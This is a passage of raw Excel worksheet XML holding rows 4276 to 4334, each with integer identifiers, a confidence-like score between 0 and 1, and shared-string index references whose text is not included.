        <v>4274</v>
      </c>
      <c r="B4276">
        <v>7841</v>
      </c>
      <c r="C4276">
        <v>7841</v>
      </c>
      <c r="D4276">
        <v>2</v>
      </c>
      <c r="E4276">
        <v>0.9976000189781189</v>
      </c>
      <c r="F4276" t="s">
        <v>5592</v>
      </c>
      <c r="G4276" t="s">
        <v>8453</v>
      </c>
      <c r="H4276" t="s">
        <v>8454</v>
      </c>
    </row>
    <row r="4277" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4277" s="1">
        <v>4275</v>
      </c>
      <c r="B4277">
        <v>7847</v>
      </c>
      <c r="C4277">
        <v>7847</v>
      </c>
      <c r="D4277">
        <v>2</v>
      </c>
      <c r="E4277">
        <v>0.99800002574920654</v>
      </c>
      <c r="F4277" t="s">
        <v>5592</v>
      </c>
      <c r="G4277" t="s">
        <v>8455</v>
      </c>
      <c r="H4277" t="s">
        <v>8005</v>
      </c>
    </row>
    <row r="4278" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4278" s="1">
        <v>4276</v>
      </c>
      <c r="B4278">
        <v>2091</v>
      </c>
      <c r="C4278">
        <v>2091</v>
      </c>
      <c r="D4278">
        <v>2</v>
      </c>
      <c r="E4278">
        <v>0.99879997968673706</v>
      </c>
      <c r="F4278" t="s">
        <v>5592</v>
      </c>
      <c r="G4278" t="s">
        <v>8456</v>
      </c>
      <c r="H4278" t="s">
        <v>8457</v>
      </c>
    </row>
    <row r="4279" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4279" s="1">
        <v>4277</v>
      </c>
      <c r="B4279">
        <v>521</v>
      </c>
      <c r="C4279">
        <v>521</v>
      </c>
      <c r="D4279">
        <v>2</v>
      </c>
      <c r="E4279">
        <v>0.83279997110366821</v>
      </c>
      <c r="F4279" t="s">
        <v>5592</v>
      </c>
      <c r="G4279" t="s">
        <v>8458</v>
      </c>
      <c r="H4279" t="s">
        <v>8459</v>
      </c>
    </row>
    <row r="4280" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4280" s="1">
        <v>4278</v>
      </c>
      <c r="B4280">
        <v>532</v>
      </c>
      <c r="C4280">
        <v>532</v>
      </c>
      <c r="D4280">
        <v>2</v>
      </c>
      <c r="E4280">
        <v>0.99000000953674316</v>
      </c>
      <c r="F4280" t="s">
        <v>5592</v>
      </c>
      <c r="G4280" t="s">
        <v>8460</v>
      </c>
      <c r="H4280" t="s">
        <v>8461</v>
      </c>
    </row>
    <row r="4281" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4281" s="1">
        <v>4279</v>
      </c>
      <c r="B4281">
        <v>846</v>
      </c>
      <c r="C4281">
        <v>846</v>
      </c>
      <c r="D4281">
        <v>2</v>
      </c>
      <c r="E4281">
        <v>0.77039998769760132</v>
      </c>
      <c r="F4281" t="s">
        <v>5592</v>
      </c>
      <c r="G4281" t="s">
        <v>8462</v>
      </c>
      <c r="H4281" t="s">
        <v>8463</v>
      </c>
    </row>
    <row r="4282" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4282" s="1">
        <v>4280</v>
      </c>
      <c r="B4282">
        <v>848</v>
      </c>
      <c r="C4282">
        <v>848</v>
      </c>
      <c r="D4282">
        <v>2</v>
      </c>
      <c r="E4282">
        <v>0.85689997673034668</v>
      </c>
      <c r="F4282" t="s">
        <v>5592</v>
      </c>
      <c r="G4282" t="s">
        <v>8464</v>
      </c>
      <c r="H4282" t="s">
        <v>8465</v>
      </c>
    </row>
    <row r="4283" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4283" s="1">
        <v>4281</v>
      </c>
      <c r="B4283">
        <v>849</v>
      </c>
      <c r="C4283">
        <v>849</v>
      </c>
      <c r="D4283">
        <v>2</v>
      </c>
      <c r="E4283">
        <v>0.99720001220703125</v>
      </c>
      <c r="F4283" t="s">
        <v>5592</v>
      </c>
      <c r="G4283" t="s">
        <v>8466</v>
      </c>
      <c r="H4283" t="s">
        <v>8467</v>
      </c>
    </row>
    <row r="4284" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4284" s="1">
        <v>4282</v>
      </c>
      <c r="B4284">
        <v>850</v>
      </c>
      <c r="C4284">
        <v>850</v>
      </c>
      <c r="D4284">
        <v>2</v>
      </c>
      <c r="E4284">
        <v>0.99360001087188721</v>
      </c>
      <c r="F4284" t="s">
        <v>5592</v>
      </c>
      <c r="G4284" t="s">
        <v>8468</v>
      </c>
      <c r="H4284" t="s">
        <v>8469</v>
      </c>
    </row>
    <row r="4285" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4285" s="1">
        <v>4283</v>
      </c>
      <c r="B4285">
        <v>851</v>
      </c>
      <c r="C4285">
        <v>851</v>
      </c>
      <c r="D4285">
        <v>2</v>
      </c>
      <c r="E4285">
        <v>0.99940001964569092</v>
      </c>
      <c r="F4285" t="s">
        <v>5592</v>
      </c>
      <c r="G4285" t="s">
        <v>8470</v>
      </c>
      <c r="H4285" t="s">
        <v>8471</v>
      </c>
    </row>
    <row r="4286" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4286" s="1">
        <v>4284</v>
      </c>
      <c r="B4286">
        <v>852</v>
      </c>
      <c r="C4286">
        <v>852</v>
      </c>
      <c r="D4286">
        <v>2</v>
      </c>
      <c r="E4286">
        <v>0.99959999322891235</v>
      </c>
      <c r="F4286" t="s">
        <v>5592</v>
      </c>
      <c r="G4286" t="s">
        <v>8472</v>
      </c>
      <c r="H4286" t="s">
        <v>8473</v>
      </c>
    </row>
    <row r="4287" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4287" s="1">
        <v>4285</v>
      </c>
      <c r="B4287">
        <v>7526</v>
      </c>
      <c r="C4287">
        <v>7526</v>
      </c>
      <c r="D4287">
        <v>2</v>
      </c>
      <c r="E4287">
        <v>0.98589998483657837</v>
      </c>
      <c r="F4287" t="s">
        <v>5592</v>
      </c>
      <c r="G4287" t="s">
        <v>8474</v>
      </c>
      <c r="H4287" t="s">
        <v>8475</v>
      </c>
    </row>
    <row r="4288" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4288" s="1">
        <v>4286</v>
      </c>
      <c r="B4288">
        <v>7525</v>
      </c>
      <c r="C4288">
        <v>7525</v>
      </c>
      <c r="D4288">
        <v>2</v>
      </c>
      <c r="E4288">
        <v>0.99919998645782471</v>
      </c>
      <c r="F4288" t="s">
        <v>5592</v>
      </c>
      <c r="G4288" t="s">
        <v>8476</v>
      </c>
      <c r="H4288" t="s">
        <v>8477</v>
      </c>
    </row>
    <row r="4289" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4289" s="1">
        <v>4287</v>
      </c>
      <c r="B4289">
        <v>7523</v>
      </c>
      <c r="C4289">
        <v>7523</v>
      </c>
      <c r="D4289">
        <v>2</v>
      </c>
      <c r="E4289">
        <v>0.99519997835159302</v>
      </c>
      <c r="F4289" t="s">
        <v>5592</v>
      </c>
      <c r="G4289" t="s">
        <v>8478</v>
      </c>
      <c r="H4289" t="s">
        <v>8479</v>
      </c>
    </row>
    <row r="4290" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4290" s="1">
        <v>4288</v>
      </c>
      <c r="B4290">
        <v>7522</v>
      </c>
      <c r="C4290">
        <v>7522</v>
      </c>
      <c r="D4290">
        <v>2</v>
      </c>
      <c r="E4290">
        <v>0.99819999933242798</v>
      </c>
      <c r="F4290" t="s">
        <v>5592</v>
      </c>
      <c r="G4290" t="s">
        <v>8480</v>
      </c>
      <c r="H4290" t="s">
        <v>8481</v>
      </c>
    </row>
    <row r="4291" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4291" s="1">
        <v>4289</v>
      </c>
      <c r="B4291">
        <v>865</v>
      </c>
      <c r="C4291">
        <v>865</v>
      </c>
      <c r="D4291">
        <v>2</v>
      </c>
      <c r="E4291">
        <v>0.98580002784729004</v>
      </c>
      <c r="F4291" t="s">
        <v>5592</v>
      </c>
      <c r="G4291" t="s">
        <v>8482</v>
      </c>
      <c r="H4291" t="s">
        <v>8483</v>
      </c>
    </row>
    <row r="4292" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4292" s="1">
        <v>4290</v>
      </c>
      <c r="B4292">
        <v>7520</v>
      </c>
      <c r="C4292">
        <v>7520</v>
      </c>
      <c r="D4292">
        <v>2</v>
      </c>
      <c r="E4292">
        <v>0.93709999322891235</v>
      </c>
      <c r="F4292" t="s">
        <v>5592</v>
      </c>
      <c r="G4292" t="s">
        <v>8484</v>
      </c>
      <c r="H4292" t="s">
        <v>8485</v>
      </c>
    </row>
    <row r="4293" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4293" s="1">
        <v>4291</v>
      </c>
      <c r="B4293">
        <v>7519</v>
      </c>
      <c r="C4293">
        <v>7519</v>
      </c>
      <c r="D4293">
        <v>2</v>
      </c>
      <c r="E4293">
        <v>0.99860000610351563</v>
      </c>
      <c r="F4293" t="s">
        <v>5592</v>
      </c>
      <c r="G4293" t="s">
        <v>8486</v>
      </c>
      <c r="H4293" t="s">
        <v>8487</v>
      </c>
    </row>
    <row r="4294" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4294" s="1">
        <v>4292</v>
      </c>
      <c r="B4294">
        <v>868</v>
      </c>
      <c r="C4294">
        <v>868</v>
      </c>
      <c r="D4294">
        <v>2</v>
      </c>
      <c r="E4294">
        <v>0.99529999494552612</v>
      </c>
      <c r="F4294" t="s">
        <v>5592</v>
      </c>
      <c r="G4294" t="s">
        <v>8488</v>
      </c>
      <c r="H4294" t="s">
        <v>8489</v>
      </c>
    </row>
    <row r="4295" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4295" s="1">
        <v>4293</v>
      </c>
      <c r="B4295">
        <v>870</v>
      </c>
      <c r="C4295">
        <v>870</v>
      </c>
      <c r="D4295">
        <v>2</v>
      </c>
      <c r="E4295">
        <v>0.99519997835159302</v>
      </c>
      <c r="F4295" t="s">
        <v>5592</v>
      </c>
      <c r="G4295" t="s">
        <v>8490</v>
      </c>
      <c r="H4295" t="s">
        <v>8491</v>
      </c>
    </row>
    <row r="4296" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4296" s="1">
        <v>4294</v>
      </c>
      <c r="B4296">
        <v>871</v>
      </c>
      <c r="C4296">
        <v>871</v>
      </c>
      <c r="D4296">
        <v>2</v>
      </c>
      <c r="E4296">
        <v>0.99779999256134033</v>
      </c>
      <c r="F4296" t="s">
        <v>5592</v>
      </c>
      <c r="G4296" t="s">
        <v>8492</v>
      </c>
      <c r="H4296" t="s">
        <v>8493</v>
      </c>
    </row>
    <row r="4297" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4297" s="1">
        <v>4295</v>
      </c>
      <c r="B4297">
        <v>872</v>
      </c>
      <c r="C4297">
        <v>872</v>
      </c>
      <c r="D4297">
        <v>2</v>
      </c>
      <c r="E4297">
        <v>0.99290001392364502</v>
      </c>
      <c r="F4297" t="s">
        <v>5592</v>
      </c>
      <c r="G4297" t="s">
        <v>8494</v>
      </c>
      <c r="H4297" t="s">
        <v>8495</v>
      </c>
    </row>
    <row r="4298" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4298" s="1">
        <v>4296</v>
      </c>
      <c r="B4298">
        <v>7518</v>
      </c>
      <c r="C4298">
        <v>7518</v>
      </c>
      <c r="D4298">
        <v>2</v>
      </c>
      <c r="E4298">
        <v>0.96640002727508545</v>
      </c>
      <c r="F4298" t="s">
        <v>5592</v>
      </c>
      <c r="G4298" t="s">
        <v>8496</v>
      </c>
      <c r="H4298" t="s">
        <v>8497</v>
      </c>
    </row>
    <row r="4299" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4299" s="1">
        <v>4297</v>
      </c>
      <c r="B4299">
        <v>7517</v>
      </c>
      <c r="C4299">
        <v>7517</v>
      </c>
      <c r="D4299">
        <v>2</v>
      </c>
      <c r="E4299">
        <v>0.99589997529983521</v>
      </c>
      <c r="F4299" t="s">
        <v>5592</v>
      </c>
      <c r="G4299" t="s">
        <v>8498</v>
      </c>
      <c r="H4299" t="s">
        <v>8499</v>
      </c>
    </row>
    <row r="4300" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4300" s="1">
        <v>4298</v>
      </c>
      <c r="B4300">
        <v>878</v>
      </c>
      <c r="C4300">
        <v>878</v>
      </c>
      <c r="D4300">
        <v>2</v>
      </c>
      <c r="E4300">
        <v>0.99489998817443848</v>
      </c>
      <c r="F4300" t="s">
        <v>5592</v>
      </c>
      <c r="G4300" t="s">
        <v>8500</v>
      </c>
      <c r="H4300" t="s">
        <v>8501</v>
      </c>
    </row>
    <row r="4301" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4301" s="1">
        <v>4299</v>
      </c>
      <c r="B4301">
        <v>880</v>
      </c>
      <c r="C4301">
        <v>880</v>
      </c>
      <c r="D4301">
        <v>2</v>
      </c>
      <c r="E4301">
        <v>0.99870002269744873</v>
      </c>
      <c r="F4301" t="s">
        <v>5592</v>
      </c>
      <c r="G4301" t="s">
        <v>8502</v>
      </c>
      <c r="H4301" t="s">
        <v>8503</v>
      </c>
    </row>
    <row r="4302" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4302" s="1">
        <v>4300</v>
      </c>
      <c r="B4302">
        <v>7527</v>
      </c>
      <c r="C4302">
        <v>7527</v>
      </c>
      <c r="D4302">
        <v>2</v>
      </c>
      <c r="E4302">
        <v>0.61729997396469116</v>
      </c>
      <c r="F4302" t="s">
        <v>5592</v>
      </c>
      <c r="G4302" t="s">
        <v>8504</v>
      </c>
      <c r="H4302" t="s">
        <v>8505</v>
      </c>
    </row>
    <row r="4303" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4303" s="1">
        <v>4301</v>
      </c>
      <c r="B4303">
        <v>7528</v>
      </c>
      <c r="C4303">
        <v>7528</v>
      </c>
      <c r="D4303">
        <v>2</v>
      </c>
      <c r="E4303">
        <v>0.6624000072479248</v>
      </c>
      <c r="F4303" t="s">
        <v>5592</v>
      </c>
      <c r="G4303" t="s">
        <v>8506</v>
      </c>
      <c r="H4303" t="s">
        <v>8507</v>
      </c>
    </row>
    <row r="4304" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4304" s="1">
        <v>4302</v>
      </c>
      <c r="B4304">
        <v>7529</v>
      </c>
      <c r="C4304">
        <v>7529</v>
      </c>
      <c r="D4304">
        <v>2</v>
      </c>
      <c r="E4304">
        <v>0.68800002336502075</v>
      </c>
      <c r="F4304" t="s">
        <v>5592</v>
      </c>
      <c r="G4304" t="s">
        <v>8508</v>
      </c>
      <c r="H4304" t="s">
        <v>8509</v>
      </c>
    </row>
    <row r="4305" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4305" s="1">
        <v>4303</v>
      </c>
      <c r="B4305">
        <v>7530</v>
      </c>
      <c r="C4305">
        <v>7530</v>
      </c>
      <c r="D4305">
        <v>2</v>
      </c>
      <c r="E4305">
        <v>0.95279997587203979</v>
      </c>
      <c r="F4305" t="s">
        <v>5592</v>
      </c>
      <c r="G4305" t="s">
        <v>8510</v>
      </c>
      <c r="H4305" t="s">
        <v>8511</v>
      </c>
    </row>
    <row r="4306" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4306" s="1">
        <v>4304</v>
      </c>
      <c r="B4306">
        <v>789</v>
      </c>
      <c r="C4306">
        <v>789</v>
      </c>
      <c r="D4306">
        <v>2</v>
      </c>
      <c r="E4306">
        <v>0.95209997892379761</v>
      </c>
      <c r="F4306" t="s">
        <v>5592</v>
      </c>
      <c r="G4306" t="s">
        <v>8512</v>
      </c>
      <c r="H4306" t="s">
        <v>6062</v>
      </c>
    </row>
    <row r="4307" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4307" s="1">
        <v>4305</v>
      </c>
      <c r="B4307">
        <v>792</v>
      </c>
      <c r="C4307">
        <v>792</v>
      </c>
      <c r="D4307">
        <v>2</v>
      </c>
      <c r="E4307">
        <v>0.45140001177787781</v>
      </c>
      <c r="F4307" t="s">
        <v>5592</v>
      </c>
      <c r="G4307" t="s">
        <v>8513</v>
      </c>
      <c r="H4307" t="s">
        <v>8514</v>
      </c>
    </row>
    <row r="4308" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4308" s="1">
        <v>4306</v>
      </c>
      <c r="B4308">
        <v>794</v>
      </c>
      <c r="C4308">
        <v>794</v>
      </c>
      <c r="D4308">
        <v>2</v>
      </c>
      <c r="E4308">
        <v>0.68599998950958252</v>
      </c>
      <c r="F4308" t="s">
        <v>5592</v>
      </c>
      <c r="G4308" t="s">
        <v>8515</v>
      </c>
      <c r="H4308" t="s">
        <v>8516</v>
      </c>
    </row>
    <row r="4309" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4309" s="1">
        <v>4307</v>
      </c>
      <c r="B4309">
        <v>7549</v>
      </c>
      <c r="C4309">
        <v>7549</v>
      </c>
      <c r="D4309">
        <v>2</v>
      </c>
      <c r="E4309">
        <v>0.803600013256073</v>
      </c>
      <c r="F4309" t="s">
        <v>5592</v>
      </c>
      <c r="G4309" t="s">
        <v>8517</v>
      </c>
      <c r="H4309" t="s">
        <v>8518</v>
      </c>
    </row>
    <row r="4310" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4310" s="1">
        <v>4308</v>
      </c>
      <c r="B4310">
        <v>802</v>
      </c>
      <c r="C4310">
        <v>802</v>
      </c>
      <c r="D4310">
        <v>2</v>
      </c>
      <c r="E4310">
        <v>0.84079998731613159</v>
      </c>
      <c r="F4310" t="s">
        <v>5592</v>
      </c>
      <c r="G4310" t="s">
        <v>8519</v>
      </c>
      <c r="H4310" t="s">
        <v>8520</v>
      </c>
    </row>
    <row r="4311" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4311" s="1">
        <v>4309</v>
      </c>
      <c r="B4311">
        <v>803</v>
      </c>
      <c r="C4311">
        <v>803</v>
      </c>
      <c r="D4311">
        <v>2</v>
      </c>
      <c r="E4311">
        <v>0.73640000820159912</v>
      </c>
      <c r="F4311" t="s">
        <v>5592</v>
      </c>
      <c r="G4311" t="s">
        <v>8521</v>
      </c>
      <c r="H4311" t="s">
        <v>8522</v>
      </c>
    </row>
    <row r="4312" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4312" s="1">
        <v>4310</v>
      </c>
      <c r="B4312">
        <v>804</v>
      </c>
      <c r="C4312">
        <v>804</v>
      </c>
      <c r="D4312">
        <v>2</v>
      </c>
      <c r="E4312">
        <v>0.73079997301101685</v>
      </c>
      <c r="F4312" t="s">
        <v>5592</v>
      </c>
      <c r="G4312" t="s">
        <v>8523</v>
      </c>
      <c r="H4312" t="s">
        <v>8524</v>
      </c>
    </row>
    <row r="4313" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4313" s="1">
        <v>4311</v>
      </c>
      <c r="B4313">
        <v>805</v>
      </c>
      <c r="C4313">
        <v>805</v>
      </c>
      <c r="D4313">
        <v>2</v>
      </c>
      <c r="E4313">
        <v>0.99360001087188721</v>
      </c>
      <c r="F4313" t="s">
        <v>5592</v>
      </c>
      <c r="G4313" t="s">
        <v>8525</v>
      </c>
      <c r="H4313" t="s">
        <v>8526</v>
      </c>
    </row>
    <row r="4314" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4314" s="1">
        <v>4312</v>
      </c>
      <c r="B4314">
        <v>809</v>
      </c>
      <c r="C4314">
        <v>809</v>
      </c>
      <c r="D4314">
        <v>2</v>
      </c>
      <c r="E4314">
        <v>0.69599997997283936</v>
      </c>
      <c r="F4314" t="s">
        <v>5592</v>
      </c>
      <c r="G4314" t="s">
        <v>8527</v>
      </c>
      <c r="H4314" t="s">
        <v>8528</v>
      </c>
    </row>
    <row r="4315" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4315" s="1">
        <v>4313</v>
      </c>
      <c r="B4315">
        <v>823</v>
      </c>
      <c r="C4315">
        <v>823</v>
      </c>
      <c r="D4315">
        <v>2</v>
      </c>
      <c r="E4315">
        <v>0.79680001735687256</v>
      </c>
      <c r="F4315" t="s">
        <v>5592</v>
      </c>
      <c r="G4315" t="s">
        <v>8529</v>
      </c>
      <c r="H4315" t="s">
        <v>8530</v>
      </c>
    </row>
    <row r="4316" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4316" s="1">
        <v>4314</v>
      </c>
      <c r="B4316">
        <v>7512</v>
      </c>
      <c r="C4316">
        <v>7512</v>
      </c>
      <c r="D4316">
        <v>2</v>
      </c>
      <c r="E4316">
        <v>0.99279999732971191</v>
      </c>
      <c r="F4316" t="s">
        <v>5592</v>
      </c>
      <c r="G4316" t="s">
        <v>8531</v>
      </c>
      <c r="H4316" t="s">
        <v>8532</v>
      </c>
    </row>
    <row r="4317" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4317" s="1">
        <v>4315</v>
      </c>
      <c r="B4317">
        <v>7538</v>
      </c>
      <c r="C4317">
        <v>7538</v>
      </c>
      <c r="D4317">
        <v>2</v>
      </c>
      <c r="E4317">
        <v>0.9122999906539917</v>
      </c>
      <c r="F4317" t="s">
        <v>5592</v>
      </c>
      <c r="G4317" t="s">
        <v>8533</v>
      </c>
      <c r="H4317" t="s">
        <v>8534</v>
      </c>
    </row>
    <row r="4318" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4318" s="1">
        <v>4316</v>
      </c>
      <c r="B4318">
        <v>7537</v>
      </c>
      <c r="C4318">
        <v>7537</v>
      </c>
      <c r="D4318">
        <v>2</v>
      </c>
      <c r="E4318">
        <v>0.89429998397827148</v>
      </c>
      <c r="F4318" t="s">
        <v>5592</v>
      </c>
      <c r="G4318" t="s">
        <v>8535</v>
      </c>
      <c r="H4318" t="s">
        <v>8536</v>
      </c>
    </row>
    <row r="4319" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4319" s="1">
        <v>4317</v>
      </c>
      <c r="B4319">
        <v>7536</v>
      </c>
      <c r="C4319">
        <v>7536</v>
      </c>
      <c r="D4319">
        <v>2</v>
      </c>
      <c r="E4319">
        <v>0.99930000305175781</v>
      </c>
      <c r="F4319" t="s">
        <v>5592</v>
      </c>
      <c r="G4319" t="s">
        <v>8537</v>
      </c>
      <c r="H4319" t="s">
        <v>8538</v>
      </c>
    </row>
    <row r="4320" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4320" s="1">
        <v>4318</v>
      </c>
      <c r="B4320">
        <v>7534</v>
      </c>
      <c r="C4320">
        <v>7534</v>
      </c>
      <c r="D4320">
        <v>2</v>
      </c>
      <c r="E4320">
        <v>0.99959999322891235</v>
      </c>
      <c r="F4320" t="s">
        <v>5592</v>
      </c>
      <c r="G4320" t="s">
        <v>8539</v>
      </c>
      <c r="H4320" t="s">
        <v>8540</v>
      </c>
    </row>
    <row r="4321" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4321" s="1">
        <v>4319</v>
      </c>
      <c r="B4321">
        <v>7533</v>
      </c>
      <c r="C4321">
        <v>7533</v>
      </c>
      <c r="D4321">
        <v>2</v>
      </c>
      <c r="E4321">
        <v>0.99870002269744873</v>
      </c>
      <c r="F4321" t="s">
        <v>5592</v>
      </c>
      <c r="G4321" t="s">
        <v>8541</v>
      </c>
      <c r="H4321" t="s">
        <v>8542</v>
      </c>
    </row>
    <row r="4322" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4322" s="1">
        <v>4320</v>
      </c>
      <c r="B4322">
        <v>832</v>
      </c>
      <c r="C4322">
        <v>832</v>
      </c>
      <c r="D4322">
        <v>2</v>
      </c>
      <c r="E4322">
        <v>0.37139999866485601</v>
      </c>
      <c r="F4322" t="s">
        <v>5592</v>
      </c>
      <c r="G4322" t="s">
        <v>8543</v>
      </c>
      <c r="H4322" t="s">
        <v>8544</v>
      </c>
    </row>
    <row r="4323" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4323" s="1">
        <v>4321</v>
      </c>
      <c r="B4323">
        <v>833</v>
      </c>
      <c r="C4323">
        <v>833</v>
      </c>
      <c r="D4323">
        <v>2</v>
      </c>
      <c r="E4323">
        <v>0.8726000189781189</v>
      </c>
      <c r="F4323" t="s">
        <v>5592</v>
      </c>
      <c r="G4323" t="s">
        <v>8545</v>
      </c>
      <c r="H4323" t="s">
        <v>8546</v>
      </c>
    </row>
    <row r="4324" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4324" s="1">
        <v>4322</v>
      </c>
      <c r="B4324">
        <v>834</v>
      </c>
      <c r="C4324">
        <v>834</v>
      </c>
      <c r="D4324">
        <v>2</v>
      </c>
      <c r="E4324">
        <v>0.73710000514984131</v>
      </c>
      <c r="F4324" t="s">
        <v>5592</v>
      </c>
      <c r="G4324" t="s">
        <v>8547</v>
      </c>
      <c r="H4324" t="s">
        <v>8548</v>
      </c>
    </row>
    <row r="4325" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4325" s="1">
        <v>4323</v>
      </c>
      <c r="B4325">
        <v>835</v>
      </c>
      <c r="C4325">
        <v>835</v>
      </c>
      <c r="D4325">
        <v>2</v>
      </c>
      <c r="E4325">
        <v>0.73710000514984131</v>
      </c>
      <c r="F4325" t="s">
        <v>5592</v>
      </c>
      <c r="G4325" t="s">
        <v>8549</v>
      </c>
      <c r="H4325" t="s">
        <v>8548</v>
      </c>
    </row>
    <row r="4326" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4326" s="1">
        <v>4324</v>
      </c>
      <c r="B4326">
        <v>7532</v>
      </c>
      <c r="C4326">
        <v>7532</v>
      </c>
      <c r="D4326">
        <v>2</v>
      </c>
      <c r="E4326">
        <v>0.99809998273849487</v>
      </c>
      <c r="F4326" t="s">
        <v>5592</v>
      </c>
      <c r="G4326" t="s">
        <v>8550</v>
      </c>
      <c r="H4326" t="s">
        <v>8551</v>
      </c>
    </row>
    <row r="4327" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4327" s="1">
        <v>4325</v>
      </c>
      <c r="B4327">
        <v>7531</v>
      </c>
      <c r="C4327">
        <v>7531</v>
      </c>
      <c r="D4327">
        <v>2</v>
      </c>
      <c r="E4327">
        <v>0.99819999933242798</v>
      </c>
      <c r="F4327" t="s">
        <v>5592</v>
      </c>
      <c r="G4327" t="s">
        <v>8552</v>
      </c>
      <c r="H4327" t="s">
        <v>8553</v>
      </c>
    </row>
    <row r="4328" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4328" s="1">
        <v>4326</v>
      </c>
      <c r="B4328">
        <v>825</v>
      </c>
      <c r="C4328">
        <v>825</v>
      </c>
      <c r="D4328">
        <v>2</v>
      </c>
      <c r="E4328">
        <v>0.60009998083114624</v>
      </c>
      <c r="F4328" t="s">
        <v>5592</v>
      </c>
      <c r="G4328" t="s">
        <v>8554</v>
      </c>
      <c r="H4328" t="s">
        <v>8555</v>
      </c>
    </row>
    <row r="4329" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4329" s="1">
        <v>4327</v>
      </c>
      <c r="B4329">
        <v>7511</v>
      </c>
      <c r="C4329">
        <v>7511</v>
      </c>
      <c r="D4329">
        <v>2</v>
      </c>
      <c r="E4329">
        <v>0.46979999542236328</v>
      </c>
      <c r="F4329" t="s">
        <v>5592</v>
      </c>
      <c r="G4329" t="s">
        <v>8556</v>
      </c>
      <c r="H4329" t="s">
        <v>8557</v>
      </c>
    </row>
    <row r="4330" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4330" s="1">
        <v>4328</v>
      </c>
      <c r="B4330">
        <v>7510</v>
      </c>
      <c r="C4330">
        <v>7510</v>
      </c>
      <c r="D4330">
        <v>2</v>
      </c>
      <c r="E4330">
        <v>0.91920000314712524</v>
      </c>
      <c r="F4330" t="s">
        <v>5592</v>
      </c>
      <c r="G4330" t="s">
        <v>8558</v>
      </c>
      <c r="H4330" t="s">
        <v>8559</v>
      </c>
    </row>
    <row r="4331" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4331" s="1">
        <v>4329</v>
      </c>
      <c r="B4331">
        <v>888</v>
      </c>
      <c r="C4331">
        <v>888</v>
      </c>
      <c r="D4331">
        <v>2</v>
      </c>
      <c r="E4331">
        <v>0.98449999094009399</v>
      </c>
      <c r="F4331" t="s">
        <v>5592</v>
      </c>
      <c r="G4331" t="s">
        <v>8560</v>
      </c>
      <c r="H4331" t="s">
        <v>8561</v>
      </c>
    </row>
    <row r="4332" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4332" s="1">
        <v>4330</v>
      </c>
      <c r="B4332">
        <v>931</v>
      </c>
      <c r="C4332">
        <v>931</v>
      </c>
      <c r="D4332">
        <v>2</v>
      </c>
      <c r="E4332">
        <v>0.99040001630783081</v>
      </c>
      <c r="F4332" t="s">
        <v>5592</v>
      </c>
      <c r="G4332" t="s">
        <v>8562</v>
      </c>
      <c r="H4332" t="s">
        <v>8563</v>
      </c>
    </row>
    <row r="4333" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4333" s="1">
        <v>4331</v>
      </c>
      <c r="B4333">
        <v>7495</v>
      </c>
      <c r="C4333">
        <v>7495</v>
      </c>
      <c r="D4333">
        <v>2</v>
      </c>
      <c r="E4333">
        <v>0.63899999856948853</v>
      </c>
      <c r="F4333" t="s">
        <v>5592</v>
      </c>
      <c r="G4333" t="s">
        <v>8564</v>
      </c>
      <c r="H4333" t="s">
        <v>8565</v>
      </c>
    </row>
    <row r="4334" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4334" s="1">
        <v>4332</v>
      </c>
      <c r="B4334">
        <v>934</v>
      </c>
      <c r="C4334">
        <v>934</v>
      </c>
      <c r="D4334">
        <v>2</v>
      </c>
      <c r="E4334">
        <v>0.72729998826980591</v>
      </c>
      <c r="F4334" t="s">
        <v>5592</v>
      </c>
